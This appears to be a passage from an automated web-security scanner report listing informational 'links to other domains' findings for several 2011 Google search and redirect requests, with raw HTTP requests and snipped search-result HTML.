<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6ttMAKuTRQAJ:www.southbeachdiet.com/sbd/publicsite/south-beach-diet-iphone-app.aspx+Waterfront-media&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNE9ecYZngwAybD2Q_OtMbF3GHy96Q','','0CEsQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.indeed.com/cmp/Waterfront-Media" class=l onmousedown="return rwt(this,'','','','10','AFQjCNG1yn6JZbKpxAy4xjnYlflLSRTrKA','','0CE0QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sUcdNmYyV2AJ:www.indeed.com/cmp/Waterfront-Media+Waterfront-media&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNHt4MjEonKrsWO1DBtgkCWeWM0iBQ','','0CE8QIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.revolutionhealth.com/" class=l onmousedown="return rwt(this,'','','','11','AFQjCNFO-9-0Qw61wZZKYaIMrB1vGa7ZgQ','','0CFIQoggwCg')">Revolution Health</a>
...[SNIP]...
<div><a href="http://www.webmd.com/" class=l onmousedown="return rwt(this,'','','','12','AFQjCNENuYvN3HLTl1dStIa2f3Z4SANXJw','','0CFQQoggwCw')">WebMD</a>
...[SNIP]...
<div><a href="http://www.indeed.com/" class=l onmousedown="return rwt(this,'','','','13','AFQjCNECF5FqBLUYVpxl0tWDHV_9VTOmqQ','','0CFYQoggwDA')">Indeed</a>
...[SNIP]...
<div><a href="http://www.jillianmichaels.com/" class=l onmousedown="return rwt(this,'','','','14','AFQjCNE9-q0Yx3Qje_GspexwF9NTDSy72w','','0CFgQoggwDQ')">JillianMichaels.com</a>
...[SNIP]...

20.79. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=bug+tracking HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=bUlBHSw9RyrvSttR5U3rNRUYEyCIoOHEeyqLUjvZvJYsnwvg_xFWbDFu8wRsyPCX0JzpkjV16vXwqOAIqiLeg1KuBr3sTsQOG_a12u1qyWQimnfWv4FY2HkQyWm7z0tD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:12 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 105058

<!doctype html> <head> <title>bug tracking - Google Search</title> <script>window.google={kEI:"nJIlTtqnOYy10AGauejkCg",kEXPI:"17259,23756,24692,24878,24879,27400,28505,29702,29859,30316,30465,3
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=bug+tracking&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Bug_tracking_system" class=l onmousedown="return rwt(this,'','','','1','AFQjCNGSt7zi7r6r78G8zEqfguEkC_KCwg','','0CF0QFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:e9HBgjYvPmcJ:en.wikipedia.org/wiki/Bug_tracking_system+bug+tracking&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNHPz1EYo1ju9RwxQVsiL7O-2XBLlg','','0CGIQIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://en.wikipedia.org/wiki/Bug_tracking_system#Components" onmousedown="return rwt(this,'','','','1','AFQjCNGSt7zi7r6r78G8zEqfguEkC_KCwg','','0CGQQ0gIoADAA')">Components</a> - <a href="http://en.wikipedia.org/wiki/Bug_tracking_system#Usage" onmousedown="return rwt(this,'','','','1','AFQjCNGSt7zi7r6r78G8zEqfguEkC_KCwg','','0CGUQ0gIoATAA')">Usage</a> - <a href="http://en.wikipedia.org/wiki/Bug_tracking_system#Bug_tracking_systems_as_a_part_of_integrated_project_management_systems" onmousedown="return rwt(this,'','','','1','AFQjCNGSt7zi7r6r78G8zEqfguEkC_KCwg','','0CGYQ0gIoAjAA')">Bug tracking systems as a part ...</a> - <a href="http://en.wikipedia.org/wiki/Bug_tracking_system#Distributed_bug_tracking" onmousedown="return rwt(this,'','','','1','AFQjCNGSt7zi7r6r78G8zEqfguEkC_KCwg','','0CGcQ0gIoAzAA')">Distributed bug tracking</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Comparison_of_issue-tracking_systems" class=l onmousedown="return rwt(this,'','','','2','AFQjCNGDUuJXWPVj7RPO-y1Slzj6a160nQ','','0CGkQFjAB')">Comparison of issue-<em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:bvCHZldW1GYJ:en.wikipedia.org/wiki/Comparison_of_issue-tracking_systems+bug+tracking&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNGTBAXJwS_sYSPORJeHZSyOLf5w6A','','0CG4QIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bugzilla.org/" class=l onmousedown="return rwt(this,'','','','3','AFQjCNFmTuRcPWbMYcfeZeWGkaw0WdJcsg','','0CHEQFjAC')">Home :: Bugzilla :: bugzilla.org</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:BpOeJlnhSWAJ:www.bugzilla.org/+bug+tracking&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNFBDt-ke0z8AofJ_fwJIfkZ8-JmQQ','','0CHYQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.atlassian.com/software/jira/solutions/bug-tracking.jsp" class=l onmousedown="return rwt(this,'','','','4','AFQjCNGnvlpF4sgjDNBGbSDa8VHLQrIlbw','','0CHgQFjAD')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:mkv4Rdq2onwJ:www.atlassian.com/software/jira/solutions/bug-tracking.jsp+bug+tracking&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNEtfZhnI7DKM4X3Ga0EtGLP5Zu3dg','','0CH0QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mantisbt.org/" class=l onmousedown="return rwt(this,'','','','5','AFQjCNEoDFzAtoxyR2pWSXnI5aAosHLQMg','','0CH8QFjAE')">Mantis <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:TLmiE-hxiTUJ:www.mantisbt.org/+bug+tracking&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNEI2WCjTT22kfr04_8j5ZS69f_7Dw','','0CIQBECAwBA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fogcreek.com/fogbugz/" class=l onmousedown="return rwt(this,'','','','6','AFQjCNGfkGJfJlpz_6sn8ljCZ5QHn1U_CA','','0CIYBEBYwBQ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:gX0M89UF050J:www.fogcreek.com/fogbugz/+bug+tracking&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNEeojZNa0PfKXPxBBwYd5vfMVuG0A','','0CIsBECAwBQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.joelonsoftware.com/articles/fog0000000029.html" class=l onmousedown="return rwt(this,'','','','7','AFQjCNGlouJopJzJsufknlbcYveR3fEnKA','','0CI0BEBYwBg')">Painless <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:7gOAt9acjMEJ:www.joelonsoftware.com/articles/fog0000000029.html+bug+tracking&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNFQquymuH6dXtVi-CRJ7-_pHyj7DA','','0CJIBECAwBg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ifdefined.com/bugtrackernet.html" class=l onmousedown="return rwt(this,'','','','8','AFQjCNF_A23sBkQ1h4GzyacZ9Nsukq56LQ','','0CJQBEBYwBw')">BugTracker.NET Home - Free <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:RWxCCvfaA5IJ:ifdefined.com/bugtrackernet.html+bug+tracking&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNHhZj4db7MJyNtozBugYPwYaP8jmw','','0CJkBECAwBw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.debian.org/Bugs/" class=l onmousedown="return rwt(this,'','','','9','AFQjCNGTauCz-x6BiPNPiP1rdqEwRYywtA','','0CJsBEBYwCA')">Debian <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:iKyHH49TdB4J:www.debian.org/Bugs/+bug+tracking&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNEYB74NWajlRNNhZfK4OtprGFgYkQ','','0CKABECAwCA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://elementool.com/" class=l onmousedown="return rwt(this,'','','','10','AFQjCNF8WHN2D07B8gLtVABMdMAa5E3-Cg','','0CKIBEBYwCQ')">Project Management Software</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:pM6BltjZBlYJ:elementool.com/+bug+tracking&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNEqJaH_UTg7dLCCLp0YgtlXibtE2g','','0CKcBECAwCQ')">Cached</a>
...[SNIP]...

20.80. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=%22ArgumentOutOfRangeException%22&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 23:35:22 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76060

<!doctype html><head><title>&quot;ArgumentOutOfRangeException&quot; - Google Search</title><script>window.google={kEI:"uhQmTteAOa-40AGDgM3JCg",kEXPI:"17259,28505,28936,29859,30316,30465,30727,31388,31
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=%22ArgumentOutOfRangeException%22&oe=utf-8&rls=org.mozilla:en-US:unofficial&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception.aspx" class=l onmousedown="return rwt(this,'','','','1','AFQjCNHt7LpFDkTTyOWuAgCcOMZi2AccVA','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:YVLUv65ie_EJ:msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception.aspx+%22ArgumentOutOfRangeException%22&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNE6HWuXEpwvuZZn6gJ71jeZ3DuF3w','','0CBgQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception(v=vs.71).aspx" class=l onmousedown="return rwt(this,'','','','2','AFQjCNEUnx3jf98DOvQHNCEHu9KPy_TO6g','','0CBoQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:e6Pe1TZ19fYJ:msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception(v%3Dvs.71).aspx+%22ArgumentOutOfRangeException%22&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNEAr2SX_l4vPB8nnPXySZi1_c517g','','0CBwQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://support.microsoft.com/kb/839588" class=l onmousedown="return rwt(this,'','','','3','AFQjCNFGbW2lynoIIA8t7jsCK2IH6nk1IQ','','0CB0QFjAC')">FIX: You receive a System.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:XFS8Q_aXddwJ:support.microsoft.com/kb/839588+%22ArgumentOutOfRangeException%22&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNGkH8vsgE7bHrwJ5Lebcnx6uYFEWQ','','0CB8QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://penguin.ewu.edu/cscd306/refdocs/System/types/ArgumentOutOfRangeException.html" class=l onmousedown="return rwt(this,'','','','4','AFQjCNGxnnLSTqfdhQqj0j6h-3Mcx0_lVw','','0CCEQFjAD')">Type: System.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uy0HaXXj4IYJ:penguin.ewu.edu/cscd306/refdocs/System/types/ArgumentOutOfRangeException.html+%22ArgumentOutOfRangeException%22&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNHqjUs8Xg2ACY7vdhEfHETIZNs97g','','0CCMQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://stackoverflow.com/questions/600308/argumentoutofrangeexception-index-was-out-of-range" class=l onmousedown="return rwt(this,'','','','5','AFQjCNGi-obdizWQylcBYtS058Pw8I2huA','','0CCQQFjAE')">nhibernate - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9AmTS3jYI30J:stackoverflow.com/questions/600308/argumentoutofrangeexception-index-was-out-of-range+%22ArgumentOutOfRangeException%22&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNGdALGcLUnNpvbSb1ZyqWJrlf8RtQ','','0CCsQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dotnetperls.com/argumentoutofrangeexception" class=l onmousedown="return rwt(this,'','','','6','AFQjCNFRe3argRzfn-zvtzGSOfnk4tg2Bw','','0CC0QFjAF')">C# <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tnLrFglkJ6cJ:www.dotnetperls.com/argumentoutofrangeexception+%22ArgumentOutOfRangeException%22&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNHWL_7WW6KPAszXEU4q7OuEQBYKLA','','0CC8QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.gnu.org/projects/dotgnu/pnetlib-doc/System/ArgumentOutOfRangeException.html" class=l onmousedown="return rwt(this,'','','','7','AFQjCNG33IyGN2XnWTY3dhxXQ1gTT3W8Mw','','0CDAQFjAG')">System.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mnN-1tk0NhwJ:www.gnu.org/projects/dotgnu/pnetlib-doc/System/ArgumentOutOfRangeException.html+%22ArgumentOutOfRangeException%22&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGpctGhZWeXIZsLV78WISadsB_dJA','','0CDIQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://docs.go-mono.com/System.ArgumentOutOfRangeException" class=l onmousedown="return rwt(this,'','','','8','AFQjCNEN-zcmQFa9ZmGR_nD2XW_dBMCKRg','','0CDQQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:PjTQ8inOZwMJ:docs.go-mono.com/System.ArgumentOutOfRangeException+%22ArgumentOutOfRangeException%22&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNHnlXNVCDsUC7-JXAPaCulct-65RQ','','0CDYQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.kellyethridge.com/vbcorlib/doc/ArgumentOutOfRangeException.html" class=l onmousedown="return rwt(this,'','','','9','AFQjCNFjF3hjA8X6dR6twb1dkH4jy452_Q','','0CDcQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZJHoYvJo0MsJ:www.kellyethridge.com/vbcorlib/doc/ArgumentOutOfRangeException.html+%22ArgumentOutOfRangeException%22&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNHmt9o98cvdsaG4QVfk-wj386K7eQ','','0CDkQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.velocityreviews.com/forums/t89506-system-argumentoutofrangeexception-index-was-out-of-range.html" class=l onmousedown="return rwt(this,'','','','10','AFQjCNFw6TPokranny5fqmojfpyoI2WrAg','','0CDsQFjAJ')">System.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:D7gtFZ07oL4J:www.velocityreviews.com/forums/t89506-system-argumentoutofrangeexception-index-was-out-of-range.html+%22ArgumentOutOfRangeException%22&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNEaJn8Oyec2NxUEmzi3NN-_TH2NHA','','0CEIQIDAJ')">Cached</a>
...[SNIP]...

20.81. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=boston+herald&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:39:26 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81395

<!doctype html><head><title>boston herald - Google Search</title><script>window.google={kEI:"fuslTsTLIojZ0QHQ7cDmCg",kEXPI:"17259,28505,29859,30316,30465,30727,31388,31406,31493",kCSI:{e:"17259,28505,
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=boston+herald&oe=utf-8&rls=org.mozilla:en-US:unofficial&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bostonherald.com/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNHdQCasYQ-wZeu0UAGNggG90DKJNw','','0CCUQFjAA')">Home - <em>
...[SNIP]...
<h3 class="r"><a href="http://www.bostonherald.com/sports/" class=l onmousedown="return rwt(this,'','','','2','AFQjCNE4m6GQV4OC1lgmnELAqiunXRgGtg','','0CCgQFjAB')">Sports - <em>
...[SNIP]...
<h3 class="r"><a href="http://www.bostonherald.com/news/" class=l onmousedown="return rwt(this,'','','','3','AFQjCNEDkU7hpisNyjHita6-ZhvyPBgSzQ','','0CCsQFjAC')">News &amp; Opinion - <em>
...[SNIP]...
<h3 class="r"><a href="http://www.bostonherald.com/sports/baseball/index.bg" class=l onmousedown="return rwt(this,'','','','4','AFQjCNEvl0IurF5DS3zH5CchJOY1Szw9-Q','','0CC4QFjAD')">Red Sox &amp; MLB - Sports - <em>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Boston_Herald" class=l onmousedown="return rwt(this,'','','','5','AFQjCNGC1QbzohlBFcC62_fdSu7o_aNvyQ','','0CDIQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AAB1XHJU8VIJ:en.wikipedia.org/wiki/Boston_Herald+boston+herald&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNF9UXH2goMAeIvaLMwsfnm4c90vTQ','','0CDQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.legacy.com/obituaries/bostonherald/" class=l onmousedown="return rwt(this,'','','','6','AFQjCNEFiwYzvxiOuYe28bUmS7FdhThVhw','','0CDYQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UJmbmH6db48J:www.legacy.com/obituaries/bostonherald/+boston+herald&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNGc0Cg8-1rGyyOQqerk89Fq1AaGBA','','0CDgQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jobfind.com/" class=l onmousedown="return rwt(this,'','','','7','AFQjCNGLl0JvVXBaORrnhq-1A2BxA59nYQ','','0CDoQFjAG')">Jobfind - <em>
...[SNIP]...
<h3 class="r"><a href="http://www.twitter.com/bostonherald" class=l onmousedown="return rwt(this,'','','','8','AFQjCNGEfNvZvC4tld7Ixad0OT1BP5Pgxw','','0CD0QFjAH')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.newseum.org/todaysfrontpages/hr.asp?fpVname=MA_BH&amp;ref_pge=lst" class=l onmousedown="return rwt(this,'','','','9','AFQjCNHWucsKqqROi8qqckvwrGu4yqCNLw','','0CD8QFjAI')">Newseum | Today&#39;s Front Pages | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iGZWYyai9rMJ:www.newseum.org/todaysfrontpages/hr.asp%3FfpVname%3DMA_BH%26ref_pge%3Dlst+boston+herald&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNFPUmo8NkM8npPQeCV5cOunDOeZ6g','','0CEMQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.heraldmedia.com/bostonHerald/index.html" class=l onmousedown="return rwt(this,'','','','10','AFQjCNHRz3DDkyPYea_ryUW4m-uOonNP8w','','0CEUQFjAJ')">The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AFHB6oN7HR8J:www.heraldmedia.com/bostonHerald/index.html+boston+herald&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNGHZ5CtnUjzQH32B-Km4IBmsONttQ','','0CEcQIDAJ')">Cached</a>
...[SNIP]...
<li class=w0 style="list-style-position:outside;margin-top:5px"><a href="http://www.bostonherald.com/blogs/entertainment/love_that_tv/?p=669&amp;srvc=blogs&amp;position=recent" class=l onmousedown="return rwt(this,'','','','11','AFQjCNEEU3Fi2f_PL9n7Q5ZQyb9FbJGeWw','','0CEkQqQIwCg')">Search Past 7 days Archives</a>
...[SNIP]...
<div style=max-width:509px><a href="http://www.bostonherald.com/news/opinion/editorials/view/20110719dont_blame_the_tests/" class=l onmousedown="return rwt(this,'','','','12','AFQjCNFLWXRfVk-8HkVQtAIFUcWCuod-_Q','','0CEwQqQIwCw')">Don&#39;t blame the tests</a>
...[SNIP]...
<div style=max-width:509px><a href="http://www.allaccess.com/net-news/archive/story/93976/prosecutors-to-retry-former-boston-talker-on-moles" class=l onmousedown="return rwt(this,'','','','13','AFQjCNGxAU6kVMpf4lV39_rKqoIXq8iZYw','','0CE8QqQIwDA')">Prosecutors To Retry Former <em>
...[SNIP]...

20.82. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fcorporate.everydayhealth.com%2F&ei=tuYlTuabMaTb0QG_89HiCg&usg=AFQjCNHABxMIlzi-Z9-GYytDSaro2mdJUw HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Waterfront-media
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 302 Found
Location: http://corporate.everydayhealth.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Tue, 19 Jul 2011 20:20:05 GMT
Server: gws
Content-Length: 233
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://corporate.everydayhealth.com/">here</A>
...[SNIP]...

20.83. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=2&ved=0CCgQFjAB&url=http%3A%2F%2Fwww.bostonherald.com%2Fsports%2F&ei=fuslTsTLIojZ0QHQ7cDmCg&usg=AFQjCNE4m6GQV4OC1lgmnELAqiunXRgGtg HTTP/1.1
Host: www.google.com
